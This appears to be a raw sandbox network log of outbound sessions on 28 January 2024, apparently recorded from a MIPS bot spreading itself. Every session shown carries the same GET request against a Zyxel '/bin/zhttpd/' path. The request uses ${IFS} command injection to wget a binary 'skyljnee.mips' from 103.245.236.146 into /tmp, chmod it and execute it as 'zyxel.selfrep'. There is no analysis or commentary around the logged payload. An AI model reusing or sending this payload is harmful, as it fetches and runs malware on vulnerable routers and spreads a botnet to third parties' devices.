                                                        Jan 28, 2024 10:12:59.535768032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6094192.168.2.145682864.118.73.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535819054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6095192.168.2.1438408210.244.48.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535844088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6096192.168.2.145437090.16.27.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535892963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6097192.168.2.1447840101.73.187.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535922050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6098192.168.2.143832232.238.221.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535948038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6099192.168.2.14541522.128.174.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535988092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6100192.168.2.144772649.68.140.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536017895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6101192.168.2.1452380210.124.209.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536062002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6102192.168.2.1459374205.231.124.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536107063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6103192.168.2.1460668209.170.181.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536144018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6104192.168.2.1438276139.72.109.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536199093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6105192.168.2.143514058.250.228.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536248922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6106192.168.2.1434362174.133.132.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536287069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6107192.168.2.145074017.199.38.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536313057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6108192.168.2.1460592207.110.1.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536339998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6109192.168.2.1445594170.81.82.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536371946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6110192.168.2.143952652.227.82.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536427021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6111192.168.2.1432868208.145.193.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536451101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6112192.168.2.1435266201.44.79.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536508083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6113192.168.2.1460706184.42.174.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536555052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6114192.168.2.1447714211.67.181.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536571980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6115192.168.2.144267061.78.201.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536612988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6116192.168.2.1444348202.192.161.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536647081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6117192.168.2.1440332170.70.252.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536668062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6118192.168.2.1454220211.105.235.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536710978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6119192.168.2.145687845.128.215.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536757946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6120192.168.2.145392292.179.70.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536787033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6121192.168.2.1448616175.208.198.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536830902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6122192.168.2.1434866152.41.35.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536875010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6123192.168.2.1450284111.148.157.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536902905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6124192.168.2.1437664202.177.39.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536952972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6125192.168.2.145983080.201.5.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.536993980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6126192.168.2.144028879.164.199.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537033081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6127192.168.2.144153899.139.51.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537079096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6128192.168.2.143914896.1.1.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537133932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6129192.168.2.144025689.63.115.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537156105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6130192.168.2.143752042.112.135.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537197113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6131192.168.2.1445472211.128.49.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537249088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6132192.168.2.1452742200.225.93.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537286997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6133192.168.2.1441606198.171.84.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537326097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6134192.168.2.1446794150.93.252.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537369013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6135192.168.2.1443756162.15.101.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537409067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6136192.168.2.1433110156.189.72.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537451029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6137192.168.2.1435192141.33.17.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537507057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6138192.168.2.1451152218.197.163.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537553072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6139192.168.2.1448620201.19.67.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537578106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6140192.168.2.1437174222.81.16.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537621021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6141192.168.2.144144251.248.211.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537694931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6142192.168.2.1455948190.57.165.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537731886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6143192.168.2.1454460112.204.59.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537760973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6144192.168.2.144620699.209.7.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537806034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6145192.168.2.1456526123.185.98.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537852049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6146192.168.2.1452986105.197.51.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537916899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6147192.168.2.1444652200.168.122.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537938118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6148192.168.2.1459038156.53.155.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.537985086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6149192.168.2.1445660131.124.187.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538029909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6150192.168.2.144323260.63.117.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538049936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6151192.168.2.1457154198.176.73.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538094044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6152192.168.2.143385489.226.16.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538131952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6153192.168.2.144921839.212.179.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538166046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6154192.168.2.14486242.253.107.49443
                                                        TimestampBytes transferredDirectionData
